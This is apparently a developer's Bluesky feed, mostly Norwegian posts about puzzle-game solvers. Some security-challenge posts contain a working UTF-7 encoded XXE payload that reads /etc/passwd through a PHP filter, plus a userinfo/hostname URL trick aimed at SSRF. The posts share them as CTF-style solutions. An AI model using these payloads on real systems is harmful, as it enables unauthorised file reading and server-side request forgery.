martcl's Avatar

martcl

@martcl

Developer, CTF player and golang enjoyer.

40
Followers
199
Following
12
Posts
28.11.2024
Joined
Posts Following

Latest posts by martcl @martcl

Gitt at dette er mulig, så er det ikke en god idé. Rettsstaten vil stagnere ved at det blir krevende å få inn nye endringer og endre status quo . typ ting som var ulovlig i 1972 som er lovlig nå. Vi trenger mennesker som hjelper mennesker her.

26.11.2025 09:18 👍 1 🔁 0 💬 1 📌 0

NRK lanserte "Kula" og det ga meg inspirasjon til å se på dette problemet på nytt. Løsningen er en blanding av det beste fra mitt tidligere program, lærdom fra Tommy Odland’s løsning og en YouTube video om trekantsøk.

16.11.2025 11:39 👍 0 🔁 0 💬 0 📌 0
Preview
GitHub - martcl/nrk-former-trekant: Program som løser NRK former spillet automatisk med trekantsøk. Program som løser NRK former spillet automatisk med trekantsøk. - martcl/nrk-former-trekant

Ny fremgangsmåte for å løse NRK former. Finner beste i dag på 0.12 sekunder!

Les kode og algoritme her: github.com/martcl/nrk-f...

16.11.2025 11:28 👍 1 🔁 0 💬 1 📌 0

<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4

22.03.2025 20:12 👍 3 🔁 0 💬 0 📌 0

Sorry if I'm interpenetrating wrong or ruining the competition. I really enjoined the article and learned something new! 👑 My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a blsky post!

22.03.2025 20:12 👍 0 🔁 0 💬 1 📌 0

I interoperate the words "post your solution" and "reply" as it's OK to share a solution publicly before the competition is finished. Just feels a bit strange 😅

22.03.2025 19:57 👍 0 🔁 0 💬 1 📌 0

With "reply", do you mean comment our solution here?

22.03.2025 19:48 👍 0 🔁 0 💬 1 📌 0

Better to just use the browser. No updates;)

11.03.2025 18:59 👍 0 🔁 0 💬 0 📌 0

… Depending on how the function is used, you would need to add one more colon to my original url to get a ssrf.

05.03.2025 14:16 👍 1 🔁 0 💬 0 📌 0

This is just url parsing. The vuln comes from how you use the function I guess. ssrf could definitely become an issue here since hostname assumption is wrong

05.03.2025 14:12 👍 0 🔁 0 💬 2 📌 0

regex <3 `https://example.com:pass@attacker.example.com`

04.03.2025 22:28 👍 0 🔁 0 💬 1 📌 0
Preview
GitHub - martcl/nrk-former: Løser NRK former med A* Løser NRK former med A*. Contribute to martcl/nrk-former development by creating an account on GitHub.

NRK former er et kult spill! Jeg har brukt de siste dagene på å lage et program for å finne den teoretiske beste poengsummen det er mulig å få. 🫣 Så hvis noen en gang sitter og lurer på, hvordan Norges beste fikk så bra score;

github.com/martcl/nrk-f...

30.11.2024 10:51 👍 8 🔁 0 💬 0 📌 0
Preview
GitHub - TheN00bBuilder/cve-2024-11477-writeup: CVE-2024-11477 7Zip Code Execution Writeup and Analysis CVE-2024-11477 7Zip Code Execution Writeup and Analysis - TheN00bBuilder/cve-2024-11477-writeup

Spent some time researching #CVE-2024-11477, the new #7zip CVE and made a writeup about my work on it. Let me know what you think! github.com/TheN00bBuild...

29.11.2024 06:33 👍 20 🔁 5 💬 1 📌 1